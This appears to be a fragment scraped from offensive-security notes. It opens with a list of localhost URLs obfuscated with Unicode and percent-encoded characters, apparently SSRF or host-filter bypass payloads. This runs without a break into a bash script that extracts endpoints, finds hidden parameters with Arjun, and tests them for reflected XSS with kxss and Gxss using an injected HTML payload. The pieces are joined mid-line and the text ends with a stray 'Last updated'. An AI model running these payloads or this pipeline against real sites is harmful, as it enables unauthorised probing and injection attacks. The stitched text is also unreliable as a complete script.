https://%E1%A0%8Clocalhost/
https://%E1%A0%8Dlocalhost/
https://%E1%A0%8Elocalhost/
https://%E1%A0%8Flocalhost/
https://%E2%80%8Blocalhost/
https://%E2%81%A0localhost/
https://%E2%81%A4localhost/
https://localho%EF%AC%86/
https://lo%E3%8E%88host/
https://localho%EF%AC%85/# step 15: Extract dir-Endpoints for Find Hidden Parameters with Arjun and save output to a file (arjun_dir_endpoints.txt)
echo -e "Filtering Directory-Endpoints for Find Hidden Parameters with Arjun..."
cat "$output_dir/endpoints.txt" | cut -d/ -f-4 | sed 's/?.*//' | sed 's/.php.*//' | sed 's/.html.*//' | sed 's/.htm.*//' | sed 's/.js.*//' | sed 's/.txt.*//' | sed 's/.jsp.*//' | sed 's/.jspx.*//' | sed 's/.do.*//' | sed 's/.action.*//' | sed 's/.asp.*//' | sed 's/.aspx.*//' | uro | tee "$output_dir/arjun_dir_endpoints.txt"
cat "$output_dir/endpoints.txt" | cut -d/ -f-5 | sed 's/?.*//' | sed 's/.php.*//' | sed 's/.html.*//' | sed 's/.htm.*//' | sed 's/.js.*//' | sed 's/.txt.*//' | sed 's/.jsp.*//' | sed 's/.jspx.*//' | sed 's/.do.*//' | sed 's/.action.*//' | sed 's/.asp.*//' | sed 's/.aspx.*//' | uro | tee -a "$output_dir/arjun_dir_endpoints.txt"
cat "$output_dir/endpoints.txt" | sed 's/?.*//'| tee -a "$output_dir/arjun_dir_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 16: Find Hidden Parameters on Passive Dir-Endpoints with Arjun
echo -e "Running Arjun to find After first Directory for Hidden Parameters..."
arjun -i "$output_dir/arjun_dir_endpoints.txt" -oT "$output_dir/arjun_result_dir_endpoints.txt"
cat "$output_dir/arjun_result_dir_endpoints.txt" | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee -a "$output_dir/arjun-xss.txt"
cat "$output_dir/arjun-xss.txt" | kxss | tee -a "$output_dir/kxss-result.txt"
cat "$output_dir/arjun-xss.txt" | Gxss -p '"><a href=https://bing.com>hacked' | tee -a "$output_dir/Gxss-result.txt"Last updated